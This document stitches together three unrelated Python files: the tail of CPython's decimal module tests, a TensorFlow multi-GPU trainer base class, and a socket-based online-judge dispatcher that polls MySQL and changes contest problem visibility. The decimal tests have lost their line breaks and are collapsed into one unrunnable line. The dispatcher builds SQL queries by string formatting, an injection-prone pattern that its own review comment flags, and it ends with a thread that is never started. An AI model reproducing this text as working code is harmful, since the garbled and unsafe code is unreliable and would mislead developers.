c.traps[InvalidOperation] = True c.prec = 2 self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501) def test_va_args_exceptions(self): Decimal = C.Decimal Context = C.Context x = Decimal("10001111111") for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10', 'logb', 'logical_invert', 'next_minus', 'next_plus', 'normalize', 'number_class', 'sqrt', 'to_eng_string']: func = getattr(x, attr) self.assertRaises(TypeError, func, context="x") self.assertRaises(TypeError, func, "x", context=None) for attr in ['compare', 'compare_signal', 'logical_and', 'logical_or', 'max', 'max_mag', 'min', 'min_mag', 'remainder_near', 'rotate', 'scaleb', 'shift']: func = getattr(x, attr) self.assertRaises(TypeError, func, context="x") self.assertRaises(TypeError, func, "x", context=None) self.assertRaises(TypeError, x.to_integral, rounding=None, context=[]) self.assertRaises(TypeError, x.to_integral, rounding={}, context=[]) self.assertRaises(TypeError, x.to_integral, [], []) self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[]) self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[]) self.assertRaises(TypeError, x.to_integral_value, [], []) self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[]) self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[]) self.assertRaises(TypeError, x.to_integral_exact, [], []) self.assertRaises(TypeError, x.fma, 1, 2, context="x") self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None) self.assertRaises(TypeError, x.quantize, 1, [], context=None) self.assertRaises(TypeError, x.quantize, 1, [], rounding=None) self.assertRaises(TypeError, x.quantize, 1, [], []) c = Context() self.assertRaises(TypeError, c.power, 1, 2, mod="x") self.assertRaises(TypeError, c.power, 1, "x", mod=None) self.assertRaises(TypeError, c.power, "x", 2, mod=None) @requires_extra_functionality def test_c_context_templates(self): self.assertEqual( C.BasicContext._traps, 
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow| C.DecUnderflow|C.DecClamped ) self.assertEqual( C.DefaultContext._traps, C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow ) @requires_extra_functionality def test_c_signal_dict(self): # SignalDict coverage Context = C.Context DefaultContext = C.DefaultContext InvalidOperation = C.InvalidOperation FloatOperation = C.FloatOperation DivisionByZero = C.DivisionByZero Overflow = C.Overflow Subnormal = C.Subnormal Underflow = C.Underflow Rounded = C.Rounded Inexact = C.Inexact Clamped = C.Clamped DecClamped = C.DecClamped DecInvalidOperation = C.DecInvalidOperation DecIEEEInvalidOperation = C.DecIEEEInvalidOperation def assertIsExclusivelySet(signal, signal_dict): for sig in signal_dict: if sig == signal: self.assertTrue(signal_dict[sig]) else: self.assertFalse(signal_dict[sig]) c = DefaultContext.copy() # Signal dict methods self.assertTrue(Overflow in c.traps) c.clear_traps() for k in c.traps.keys(): c.traps[k] = True for v in c.traps.values(): self.assertTrue(v) c.clear_traps() for k, v in c.traps.items(): self.assertFalse(v) self.assertFalse(c.flags.get(Overflow)) self.assertIs(c.flags.get("x"), None) self.assertEqual(c.flags.get("x", "y"), "y") self.assertRaises(TypeError, c.flags.get, "x", "y", "z") self.assertEqual(len(c.flags), len(c.traps)) s = sys.getsizeof(c.flags) s = sys.getsizeof(c.traps) s = c.flags.__repr__() # Set flags/traps. c.clear_flags() c._flags = DecClamped self.assertTrue(c.flags[Clamped]) c.clear_traps() c._traps = DecInvalidOperation self.assertTrue(c.traps[InvalidOperation]) # Set flags/traps from dictionary. 
c.clear_flags() d = c.flags.copy() d[DivisionByZero] = True c.flags = d assertIsExclusivelySet(DivisionByZero, c.flags) c.clear_traps() d = c.traps.copy() d[Underflow] = True c.traps = d assertIsExclusivelySet(Underflow, c.traps) # Random constructors IntSignals = { Clamped: C.DecClamped, Rounded: C.DecRounded, Inexact: C.DecInexact, Subnormal: C.DecSubnormal, Underflow: C.DecUnderflow, Overflow: C.DecOverflow, DivisionByZero: C.DecDivisionByZero, FloatOperation: C.DecFloatOperation, InvalidOperation: C.DecIEEEInvalidOperation } IntCond = [ C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError, C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError, C.DecConversionSyntax, ] lim = len(OrderedSignals[C]) for r in range(lim): for t in range(lim): for round in RoundingModes: flags = random.sample(OrderedSignals[C], r) traps = random.sample(OrderedSignals[C], t) prec = random.randrange(1, 10000) emin = random.randrange(-10000, 0) emax = random.randrange(0, 10000) clamp = random.randrange(0, 2) caps = random.randrange(0, 2) cr = random.randrange(0, 2) c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax, capitals=caps, clamp=clamp, flags=list(flags), traps=list(traps)) self.assertEqual(c.prec, prec) self.assertEqual(c.rounding, round) self.assertEqual(c.Emin, emin) self.assertEqual(c.Emax, emax) self.assertEqual(c.capitals, caps) self.assertEqual(c.clamp, clamp) f = 0 for x in flags: f |= IntSignals[x] self.assertEqual(c._flags, f) f = 0 for x in traps: f |= IntSignals[x] self.assertEqual(c._traps, f) for cond in IntCond: c._flags = cond self.assertTrue(c._flags&DecIEEEInvalidOperation) assertIsExclusivelySet(InvalidOperation, c.flags) for cond in IntCond: c._traps = cond self.assertTrue(c._traps&DecIEEEInvalidOperation) assertIsExclusivelySet(InvalidOperation, c.traps) def test_invalid_override(self): Decimal = C.Decimal try: from locale import CHAR_MAX except ImportError: self.skipTest('locale.CHAR_MAX not available') def make_grouping(lst): 
return ''.join([chr(x) for x in lst]) def get_fmt(x, override=None, fmt='n'): return Decimal(x).__format__(fmt, override) invalid_grouping = { 'decimal_point' : ',', 'grouping' : make_grouping([255, 255, 0]), 'thousands_sep' : ',' } invalid_dot = { 'decimal_point' : 'xxxxx', 'grouping' : make_grouping([3, 3, 0]), 'thousands_sep' : ',' } invalid_sep = { 'decimal_point' : '.', 'grouping' : make_grouping([3, 3, 0]), 'thousands_sep' : 'yyyyy' } if CHAR_MAX == 127: # negative grouping in override self.assertRaises(ValueError, get_fmt, 12345, invalid_grouping, 'g') self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g') self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g') def test_exact_conversion(self): Decimal = C.Decimal localcontext = C.localcontext InvalidOperation = C.InvalidOperation with localcontext() as c: c.traps[InvalidOperation] = True # Clamped x = "0e%d" % sys.maxsize self.assertRaises(InvalidOperation, Decimal, x) x = "0e%d" % (-sys.maxsize-1) self.assertRaises(InvalidOperation, Decimal, x) # Overflow x = "1e%d" % sys.maxsize self.assertRaises(InvalidOperation, Decimal, x) # Underflow x = "1e%d" % (-sys.maxsize-1) self.assertRaises(InvalidOperation, Decimal, x) def test_from_tuple(self): Decimal = C.Decimal localcontext = C.localcontext InvalidOperation = C.InvalidOperation Overflow = C.Overflow Underflow = C.Underflow with localcontext() as c: c.traps[InvalidOperation] = True c.traps[Overflow] = True c.traps[Underflow] = True # SSIZE_MAX x = (1, (), sys.maxsize) self.assertEqual(str(c.create_decimal(x)), '-0E+999999') self.assertRaises(InvalidOperation, Decimal, x) x = (1, (0, 1, 2), sys.maxsize) self.assertRaises(Overflow, c.create_decimal, x) self.assertRaises(InvalidOperation, Decimal, x) # SSIZE_MIN x = (1, (), -sys.maxsize-1) self.assertEqual(str(c.create_decimal(x)), '-0E-1000007') self.assertRaises(InvalidOperation, Decimal, x) x = (1, (0, 1, 2), -sys.maxsize-1) self.assertRaises(Underflow, c.create_decimal, x) 
self.assertRaises(InvalidOperation, Decimal, x) # OverflowError x = (1, (), sys.maxsize+1) self.assertRaises(OverflowError, c.create_decimal, x) self.assertRaises(OverflowError, Decimal, x) x = (1, (), -sys.maxsize-2) self.assertRaises(OverflowError, c.create_decimal, x) self.assertRaises(OverflowError, Decimal, x) # Specials x = (1, (), "N") self.assertEqual(str(Decimal(x)), '-sNaN') x = (1, (0,), "N") self.assertEqual(str(Decimal(x)), '-sNaN') x = (1, (0, 1), "N") self.assertEqual(str(Decimal(x)), '-sNaN1') def test_sizeof(self): Decimal = C.Decimal HAVE_CONFIG_64 = (C.MAX_PREC > 425000000) self.assertGreater(Decimal(0).__sizeof__(), 0) if HAVE_CONFIG_64: x = Decimal(10**(19*24)).__sizeof__() y = Decimal(10**(19*25)).__sizeof__() self.assertEqual(y, x+8) else: x = Decimal(10**(9*24)).__sizeof__() y = Decimal(10**(9*25)).__sizeof__() self.assertEqual(y, x+4) def test_internal_use_of_overridden_methods(self): Decimal = C.Decimal # Unsound subtyping class X(float): def as_integer_ratio(self): return 1 def __abs__(self): return self class Y(float): def __abs__(self): return [1]*200 class I(int): def bit_length(self): return [1]*200 class Z(float): def as_integer_ratio(self): return (I(1), I(1)) def __abs__(self): return self for cls in X, Y, Z: self.assertEqual(Decimal.from_float(cls(101.1)), Decimal.from_float(101.1)) def test_maxcontext_exact_arith(self): # Make sure that exact operations do not raise MemoryError due # to huge intermediate values when the context precision is very # large. # The following functions fill the available precision and are # therefore not suitable for large precisions (by design of the # specification). MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus', 'logical_and', 'logical_or', 'logical_xor', 'next_toward', 'rotate', 'shift'] Decimal = C.Decimal Context = C.Context localcontext = C.localcontext # Here only some functions that are likely candidates for triggering a # MemoryError are tested. 
deccheck.py has an exhaustive test. maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX) with localcontext(maxcontext): self.assertEqual(Decimal(0).exp(), 1) self.assertEqual(Decimal(1).ln(), 0) self.assertEqual(Decimal(1).log10(), 0) self.assertEqual(Decimal(10**2).log10(), 2) self.assertEqual(Decimal(10**223).log10(), 223) self.assertEqual(Decimal(10**19).logb(), 19) self.assertEqual(Decimal(4).sqrt(), 2) self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5')) self.assertEqual(divmod(Decimal(10), 3), (3, 1)) self.assertEqual(Decimal(10) // 3, 3) self.assertEqual(Decimal(4) / 2, 2) self.assertEqual(Decimal(400) ** -1, Decimal('0.0025')) @requires_docstrings @unittest.skipUnless(C, "test requires C version") class SignatureTest(unittest.TestCase): """Function signatures""" def test_inspect_module(self): for attr in dir(P): if attr.startswith('_'): continue p_func = getattr(P, attr) c_func = getattr(C, attr) if (attr == 'Decimal' or attr == 'Context' or inspect.isfunction(p_func)): p_sig = inspect.signature(p_func) c_sig = inspect.signature(c_func) # parameter names: c_names = list(c_sig.parameters.keys()) p_names = [x for x in p_sig.parameters.keys() if not x.startswith('_')] self.assertEqual(c_names, p_names, msg="parameter name mismatch in %s" % p_func) c_kind = [x.kind for x in c_sig.parameters.values()] p_kind = [x[1].kind for x in p_sig.parameters.items() if not x[0].startswith('_')] # parameters: if attr != 'setcontext': self.assertEqual(c_kind, p_kind, msg="parameter kind mismatch in %s" % p_func) def test_inspect_types(self): POS = inspect._ParameterKind.POSITIONAL_ONLY POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD # Type heuristic (type annotations would help!): pdict = {C: {'other': C.Decimal(1), 'third': C.Decimal(1), 'x': C.Decimal(1), 'y': C.Decimal(1), 'z': C.Decimal(1), 'a': C.Decimal(1), 'b': C.Decimal(1), 'c': C.Decimal(1), 'exp': C.Decimal(1), 'modulo': C.Decimal(1), 'num': "1", 'f': 1.0, 'rounding': 
C.ROUND_HALF_UP, 'context': C.getcontext()}, P: {'other': P.Decimal(1), 'third': P.Decimal(1), 'a': P.Decimal(1), 'b': P.Decimal(1), 'c': P.Decimal(1), 'exp': P.Decimal(1), 'modulo': P.Decimal(1), 'num': "1", 'f': 1.0, 'rounding': P.ROUND_HALF_UP, 'context': P.getcontext()}} def mkargs(module, sig): args = [] kwargs = {} for name, param in sig.parameters.items(): if name == 'self': continue if param.kind == POS: args.append(pdict[module][name]) elif param.kind == POS_KWD: kwargs[name] = pdict[module][name] else: raise TestFailed("unexpected parameter kind") return args, kwargs def tr(s): """The C Context docstrings use 'x' in order to prevent confusion with the article 'a' in the descriptions.""" if s == 'x': return 'a' if s == 'y': return 'b' if s == 'z': return 'c' return s def doit(ty): p_type = getattr(P, ty) c_type = getattr(C, ty) for attr in dir(p_type): if attr.startswith('_'): continue p_func = getattr(p_type, attr) c_func = getattr(c_type, attr) if inspect.isfunction(p_func): p_sig = inspect.signature(p_func) c_sig = inspect.signature(c_func) # parameter names: p_names = list(p_sig.parameters.keys()) c_names = [tr(x) for x in c_sig.parameters.keys()] self.assertEqual(c_names, p_names, msg="parameter name mismatch in %s" % p_func) p_kind = [x.kind for x in p_sig.parameters.values()] c_kind = [x.kind for x in c_sig.parameters.values()] # 'self' parameter: self.assertIs(p_kind[0], POS_KWD) self.assertIs(c_kind[0], POS) # remaining parameters: if ty == 'Decimal': self.assertEqual(c_kind[1:], p_kind[1:], msg="parameter kind mismatch in %s" % p_func) else: # Context methods are positional only in the C version. 
self.assertEqual(len(c_kind), len(p_kind), msg="parameter kind mismatch in %s" % p_func) # Run the function: args, kwds = mkargs(C, c_sig) try: getattr(c_type(9), attr)(*args, **kwds) except Exception: raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds)) args, kwds = mkargs(P, p_sig) try: getattr(p_type(9), attr)(*args, **kwds) except Exception: raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds)) doit('Decimal') doit('Context') all_tests = [ CExplicitConstructionTest, PyExplicitConstructionTest, CImplicitConstructionTest, PyImplicitConstructionTest, CFormatTest, PyFormatTest, CArithmeticOperatorsTest, PyArithmeticOperatorsTest, CThreadingTest, PyThreadingTest, CUsabilityTest, PyUsabilityTest, CPythonAPItests, PyPythonAPItests, CContextAPItests, PyContextAPItests, CContextWithStatement, PyContextWithStatement, CContextFlags, PyContextFlags, CSpecialContexts, PySpecialContexts, CContextInputValidation, PyContextInputValidation, CContextSubclassing, PyContextSubclassing, CCoverage, PyCoverage, CFunctionality, PyFunctionality, CWhitebox, PyWhitebox, CIBMTestCases, PyIBMTestCases, ] # Delete C tests if _decimal.so is not present. if not C: all_tests = all_tests[1::2] else: all_tests.insert(0, CheckAttributes) all_tests.insert(1, SignatureTest) def test_main(arith=None, verbose=None, todo_tests=None, debug=None): """ Execute the tests. Runs all arithmetic tests if arith is True or if the "decimal" resource is enabled in regrtest.py """ init(C) init(P) global TEST_ALL, DEBUG TEST_ALL = arith if arith is not None else is_resource_enabled('decimal') DEBUG = debug if todo_tests is None: test_classes = all_tests else: test_classes = [CIBMTestCases, PyIBMTestCases] # Dynamically build custom test definition for each file in the test # directory and add the definitions to the DecimalTest class. This # procedure insures that new files do not get skipped. 
for filename in os.listdir(directory): if '.decTest' not in filename or filename.startswith("."): continue head, tail = filename.split('.') if todo_tests is not None and head not in todo_tests: continue tester = lambda self, f=filename: self.eval_file(directory + f) setattr(CIBMTestCases, 'test_' + head, tester) setattr(PyIBMTestCases, 'test_' + head, tester) del filename, head, tail, tester try: run_unittest(*test_classes) if todo_tests is None: from doctest import IGNORE_EXCEPTION_DETAIL savedecimal = sys.modules['decimal'] if C: sys.modules['decimal'] = C run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL) sys.modules['decimal'] = P run_doctest(P, verbose) sys.modules['decimal'] = savedecimal finally: if C: C.setcontext(ORIGINAL_CONTEXT[C]) P.setcontext(ORIGINAL_CONTEXT[P]) if not C: warnings.warn('C tests skipped: no module named _decimal.', UserWarning) if not orig_sys_decimal is sys.modules['decimal']: raise TestFailed("Internal error: unbalanced number of changes to " "sys.modules['decimal'].") if __name__ == '__main__': import optparse p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]") p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test') p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests') (opt, args) = p.parse_args() if opt.skip: test_main(arith=False, verbose=True) elif args: test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug) else: test_main(arith=True, verbose=True)
# ==== ITraining.py ====
import abc
import threading
from tfcore.utilities.utils import *
from tfcore.utilities.params_serializer import ParamsSerializer


class ITrainer_Params(ParamsSerializer):
    """Abstract hyper-parameter container for an :class:`ITrainer`.

    Subclasses override ``__init__`` and extend/overwrite the defaults below;
    ``ParamsSerializer`` provides (de)serialization of the attributes.
    """

    # NOTE(review): `__metaclass__` is the Python 2 spelling and has no effect
    # under Python 3 (which this file targets, given `super().__init__()`).
    # Kept as-is so subclass instantiation behaviour does not change.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def __init__(self):
        super().__init__()
        self.is_train = True
        self.gpu = True                   # run on GPU(s) instead of CPU
        self.gpus = [0]                   # GPU ids to use, e.g. [0, 1, 2, 3]
        self.batch_size = 16              # total batch size across all GPUs
        self.epoch = 1
        self.new = True                   # True: fresh run; False: resume from checkpoint
        self.checkpoint_dir = 'checkpoints'
        # Attribute names below keep the original 'summery' spelling:
        # they are part of the serialized parameter interface.
        self.make_summery_full = False    # also log histograms of variables/gradients
        self.make_summery_graph = False   # write the graph definition to TensorBoard
        self.use_tensorboard = False      # spawn a TensorBoard server on startup


class ITrainer():
    """Abstract multi-GPU training harness (TensorFlow 1.x graph mode).

    Subclasses implement :meth:`build_model`, :meth:`validate`,
    :meth:`train_online` and :meth:`train`; :meth:`build_pipeline` wires the
    per-tower models, gradient averaging and summaries together.
    """

    # NOTE(review): ineffective under Python 3, kept for the same reason as above.
    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def __init__(self, params):
        """Create the session and all bookkeeping state.

        Args:
            params: an ``ITrainer_Params`` (sub)instance.
        """
        self.params = params
        print('Libs loaded')
        print('Tensorflow ' + tf.__version__)

        gpus = self.params.gpus
        # Restrict CUDA to the configured devices only.
        os.environ["CUDA_VISIBLE_DEVICES"] = ','.join([str(i) for i in gpus])

        if self.params.gpu:
            gpu_nums = len(self.params.gpus)
        else:
            gpu_nums = 0

        gpu_options = tf.GPUOptions()
        gpu_options.allocator_type = 'BFC'
        gpu_options.allow_growth = True     # grab GPU memory on demand, not all at once
        config = tf.ConfigProto(allow_soft_placement=True,
                                log_device_placement=False,
                                gpu_options=gpu_options,
                                device_count={'GPU': gpu_nums})
        self.sess = tf.Session(config=config)

        # Per-kind summary op collections, merged in make_summarys().
        self.summaries_val = []
        self.summaries_val_2 = []
        self.summaries_vis = []
        self.summaries_vis_2 = []
        self.summaries_vis_one = []
        self.summaries_vis_one_2 = []
        self.summaries = []
        self.summaries_2 = []
        self.summary_val = None
        self.summary_val_2 = None
        self.summary_vis = None
        self.summary_vis_2 = None
        self.summary_vis_one = None
        self.summary_vis_one_2 = None
        self.summary = None
        self.summary_2 = None

        self.model_dir = 'model'
        self.sample_dir = 'samples'
        self.checkpoint_dir = 'checkpoint'
        self.log_dir = 'logs'
        self.saver = None
        self.writer = None
        self.models = []

        # Resume the global step counter when continuing from a checkpoint.
        self.init_global_step = 0
        if not self.params.new:
            self.init_global_step = get_global_steps(self.params.checkpoint_dir)

        self.epoch = tf.placeholder(tf.int32, name='epoch')
        self.global_step = tf.Variable(self.init_global_step, trainable=False)

        # Split the configured total batch evenly across towers.
        self.batch_size_total = self.params.batch_size
        self.batch_size = int(self.batch_size_total / len(self.params.gpus))

    @abc.abstractmethod
    def __del__(self):
        # Best-effort cleanup; __del__ is not guaranteed to run at interpreter exit.
        tf.reset_default_graph()
        self.sess.close()
        print('[*] Session closed...')

    def launch_tensorboard(self):
        """Start a TensorBoard server on port 8009 (blocks until it exits)."""
        import os
        os.system('tensorboard --logdir=' + self.log_dir + ' --port=8009')
        return

    def make_summarys(self, gradient_list=None):
        """Merge all model summaries and create the log writer.

        Args:
            gradient_list: optional list of ``compute_gradients`` results, used
                for gradient histograms when ``make_summery_full`` is set.
                (Default changed from a shared mutable ``[]`` to ``None``;
                behaviour is identical.)
        """
        if gradient_list is None:
            gradient_list = []
        if self.params.make_summery_full:
            for var in tf.trainable_variables():
                self.summaries_val.append(tf.summary.histogram(var.op.name, var))
            for grads in gradient_list:
                for grad, var in grads:
                    self.summaries_val.append(tf.summary.histogram(var.op.name + '/gradients', grad))
            print(' [*] Full Summery created...')

        # Collect every model's summary ops into the trainer-level lists.
        for model in self.models:
            self.summaries_val.extend(model.summary_val)
            self.summaries_vis.extend(model.summary_vis)
            self.summaries_vis_one.extend(model.summary_vis_one)
            self.summaries.extend(model.summary)

            self.summaries_val_2.extend(model.summary_val_2)
            self.summaries_vis_2.extend(model.summary_vis_2)
            self.summaries_vis_one_2.extend(model.summary_vis_one_2)
            self.summaries_2.extend(model.summary_2)

        self.summary_val = tf.summary.merge([self.summaries_val])
        self.summary_vis = tf.summary.merge([self.summaries_vis])
        self.summary_vis_one = tf.summary.merge([self.summaries_vis_one])
        self.summary = tf.summary.merge([self.summaries])

        self.summary_val_2 = tf.summary.merge([self.summaries_val_2])
        self.summary_vis_2 = tf.summary.merge([self.summaries_vis_2])
        self.summary_vis_one_2 = tf.summary.merge([self.summaries_vis_one_2])
        self.summary_2 = tf.summary.merge([self.summaries_2])

        if self.params.make_summery_graph:
            self.writer = tf.summary.FileWriter(os.path.join(self.log_dir), self.sess.graph)
        else:
            self.writer = tf.summary.FileWriter(os.path.join(self.log_dir))

        if self.params.use_tensorboard:
            # Daemonize: os.system('tensorboard ...') never returns, and the
            # original non-daemon thread kept the process alive forever.
            t = threading.Thread(target=self.launch_tensorboard, args=())
            t.daemon = True
            t.start()

        print(' [*] Log-file ' + os.path.join(self.log_dir) + ' created...')

    @abc.abstractmethod
    def validate(self, epoch, counter, idx):
        """Run validation; must be implemented by the concrete trainer."""
        raise NotImplementedError("Please Implement this method")

    @abc.abstractmethod
    def build_model(self, tower_id):
        """Build and return the list of models for one tower."""
        raise NotImplementedError("Please Implement this method")

    @staticmethod
    def compute_tower_gradients(model, max_norm=5.0):
        """Compute per-tower gradients for ``model.total_loss``.

        Args:
            model: model object exposing ``optimizer``, ``total_loss`` and
                ``params.scope``.
            max_norm: clip norm for the (currently disabled) gradient clipping.
        Returns:
            list of ``(gradient, variable)`` pairs.
        """
        model.vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=model.params.scope)
        grads = model.optimizer.compute_gradients(model.total_loss, var_list=model.vars)
        # Gradient clipping intentionally disabled; re-enable if training diverges.
        #grads = [(tf.clip_by_norm(grad, max_norm), var) for grad, var in grads]
        print(' [*] Gradients of ' + model.params.name + ' computed...')
        return grads

    def build_pipeline(self):
        """Build one model replica per configured device, average the tower
        gradients, apply them, and wire up all summaries."""
        if self.params.gpu:
            device = "/gpu:"
        else:
            device = "/cpu:"

        tower_index = 0
        with tf.variable_scope(tf.get_variable_scope()):
            for tower_id in self.params.gpus:
                with tf.device(device + '%d' % tower_id):
                    with tf.name_scope('Tower_%d' % (tower_index)) as scope:
                        print(' [*] Tower ' + str(tower_index) + ' ' + device + str(tower_id))
                        self.models = self.build_model(tower_id=tower_index)
                        # Share variables between towers.
                        tf.get_variable_scope().reuse_variables()
                        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
                        with tf.control_dependencies(update_ops):
                            for i in range(len(self.models)):
                                gradients = self.compute_tower_gradients(self.models[i])
                                self.models[i].gradients.append(gradients)
                tower_index += 1

        gradient_list = []
        update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
        with tf.control_dependencies(update_ops):
            for i in range(len(self.models)):
                if tower_index > 1:
                    # Multi-GPU: average the gradients collected from all towers.
                    grads = average_gradients(self.models[i].gradients)
                    print(' [*] Gradients of ' + self.models[i].params.name + ' averaged...')
                else:
                    grads = self.models[i].gradients[0]
                self.models[i].optimizer = self.models[i].optimizer.apply_gradients(grads, global_step=self.global_step)
                gradient_list.append(grads)
                print(' [*] Gradients of ' + self.models[i].params.name + ' applyed...')

        self.make_summarys(gradient_list)

        print(' [*] Build pipeline pass...')
        return

    @abc.abstractmethod
    def train_online(self, batch_X, batch_Y, epoch=0, counter=1, idx=0, batch_total=0):
        """Train on a single batch; must be implemented by the concrete trainer."""
        raise NotImplementedError("Please Implement this method")

    @abc.abstractmethod
    def train(self):
        """Run the full training loop; must be implemented by the concrete trainer."""
        raise NotImplementedError("Please Implement this method")
main.py
# coding=utf-8
"""Judge-server dispatcher.

Polls the database for unjudged submissions, hands them out to connected
judger machines over raw sockets, and keeps contest problem visibility
(`auth`) in sync with contest start/end times.
"""
import MySQLdb
from queue import Queue
import socket
import json
from time import sleep
import threading
import os

mutex = threading.Lock()  # guards the queue AND the shared DB connection
queue = Queue()  # global queue of submission ids waiting to be judged

# Load settings; environment variables override the JSON file (container use).
with open("./setting.json", 'r') as myjsonfile:
    judgerjson = json.loads(myjsonfile.read())
if os.environ.get("DB_USER"):
    judgerjson["db_ip"] = os.environ.get("DB_HOST")
    judgerjson["db_pass"] = os.environ.get("DB_PASSWORD")
    judgerjson["db_user"] = os.environ.get("DB_USER")
    judgerjson["db_port"] = os.environ.get("DB_PORT")

try:
    db = MySQLdb.connect(judgerjson["db_ip"], judgerjson["db_user"],
                         judgerjson["db_pass"], judgerjson["db_database"],
                         int(judgerjson["db_port"]), charset='utf8')
except Exception as e:
    print(e)
    exit(1)


def getSubmition():
    """Poll for unjudged submissions (result = -1), queue their ids, and mark
    them dispatched (result = -6).  Runs forever in a daemon thread.

    (Function name, including the 'Submition' typo, kept for compatibility.)
    """
    global queue, mutex, db
    cursor = db.cursor()
    while True:
        sleep(1)
        if mutex.acquire():
            # NOTE(review): ids come from our own DB (integers), but building
            # SQL with %-formatting is fragile -- prefer parameterized
            # cursor.execute(sql, (value,)) throughout this module.
            cursor.execute(
                "SELECT * from judgestatus_judgestatus where result = '-1'")
            data = cursor.fetchall()
            try:
                for d in data:
                    queue.put(d[0])
                    cursor.execute(
                        "UPDATE judgestatus_judgestatus SET result = '-6' WHERE id = '%d'" % d[0])
                    db.commit()
            except Exception:
                db.rollback()
            mutex.release()
    db.close()  # unreachable: the loop above never exits


def deal_client(newSocket: socket.socket, addr):
    """Handle one judger connection: poll its status and hand it submission
    ids from the global queue.  Runs in its own thread per connection."""
    global mutex, queue
    ready = False        # judger reported "ok" on the last status poll
    cursor = db.cursor()
    falsetime = 0        # consecutive not-ready polls
    while True:
        sleep(2)  # poll every two seconds
        if mutex.acquire():  # take the queue/DB lock
            try:
                if ready and not queue.empty():
                    id = queue.get()
                    # Judger is ready: send it a judge command.
                    cursor.execute(
                        "SELECT language from judgestatus_judgestatus where id = '%d'" % (id))
                    data = cursor.fetchall()
                    # print(data[0][0])
                    newSocket.send(("judge|%d" % id).encode("utf-8"))
                    ready = False
                else:
                    newSocket.send("getstatue".encode("utf-8"))
                    data = newSocket.recv(1024)
                    recv_data = data.decode('utf-8')
                    if recv_data == "ok":
                        falsetime = 0
                        ready = True
                    else:
                        falsetime = falsetime + 1
                        ready = False
                    if falsetime >= 3600:
                        # Judger has been not-ready for too long: tell it to
                        # destroy/restart itself and drop the connection.
                        newSocket.send("timeout".encode("utf-8"))
                        # print(addr, "timeout!")
                        newSocket.close()
                        mutex.release()
                        return
                # print(addr, ready)
            except socket.error:
                newSocket.close()
                mutex.release()
                return
            except Exception:
                print("error!")
                mutex.release()
                return
            mutex.release()


server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind(("", judgerjson["server_port"]))
server.listen(20)
print("server is running!")

t = threading.Thread(target=getSubmition, args=())  # dispatcher thread
t.daemon = True  # modern spelling of the deprecated setDaemon(True)
t.start()


def changeauth():
    """Keep contest problem visibility in sync with contest timing.

    Contest problems are created with auth=2; while a contest is running they
    are switched to auth=3, and set back to auth=1 once the contest ends.
    """
    global db, mutex
    curcontest = set()   # contests currently known to be active
    curpro = set()       # problems already switched to auth=2
    curinpro = set()     # problems already switched to auth=3
    cursor = db.cursor()
    while True:
        sleep(2)
        if mutex.acquire():
            cursor.execute(
                "SELECT * from contest_contestinfo where type <> 'Personal' and TO_SECONDS(NOW()) - TO_SECONDS(begintime) <= lasttime")
            data = cursor.fetchall()
            getcontest = set()
            for d in data:
                getcontest.add(d[0])  # used below to detect finished contests
                cursor.execute(
                    "SELECT * from contest_contestproblem where contestid=%d" % d[0])
                pros = cursor.fetchall()
                for pid in pros:
                    if pid[2] not in curpro:
                        curpro.add(pid[2])
                        cursor.execute(
                            "UPDATE problem_problemdata SET auth = 2 WHERE problem = %s" % pid[2])
                        cursor.execute(
                            "UPDATE problem_problem SET auth = 2 WHERE problem = %s" % pid[2])
                        db.commit()
            cursor.execute(
                "SELECT * from contest_contestinfo where type <> 'Personal' and TO_SECONDS(NOW()) - TO_SECONDS(begintime) <= lasttime and TO_SECONDS(NOW()) - TO_SECONDS(begintime) >=-1")
            data = cursor.fetchall()
            for d in data:
                cursor.execute(
                    "SELECT * from contest_contestproblem where contestid=%d" % d[0])
                pros = cursor.fetchall()
                for pid in pros:
                    if pid[2] not in curinpro:
                        curinpro.add(pid[2])
                        cursor.execute(
                            "UPDATE problem_problemdata SET auth = 3 WHERE problem = %s" % pid[2])
                        cursor.execute(
                            "UPDATE problem_problem SET auth = 3 WHERE problem = %s" % pid[2])
                        db.commit()
            endcontest = curcontest.difference(getcontest)
            # print("curcontest", curcontest)
            for eid in endcontest:
                cursor.execute(
                    "SELECT * from contest_contestproblem where contestid=%d" % eid)
                pros = cursor.fetchall()
                for pid in pros:
                    # discard() instead of remove(): the original try/except
                    # skipped curinpro cleanup whenever pid was missing from
                    # curpro, leaving stale entries in curinpro.
                    curpro.discard(pid[2])
                    curinpro.discard(pid[2])
                    cursor.execute(
                        "UPDATE problem_problemdata SET auth = 1 WHERE problem = %s" % pid[2])
                    cursor.execute(
                        "UPDATE problem_problem SET auth = 1 WHERE problem = %s" % pid[2])
                    db.commit()
            curcontest = getcontest
            mutex.release()


t1 = threading.Thread(target=changeauth, args=())
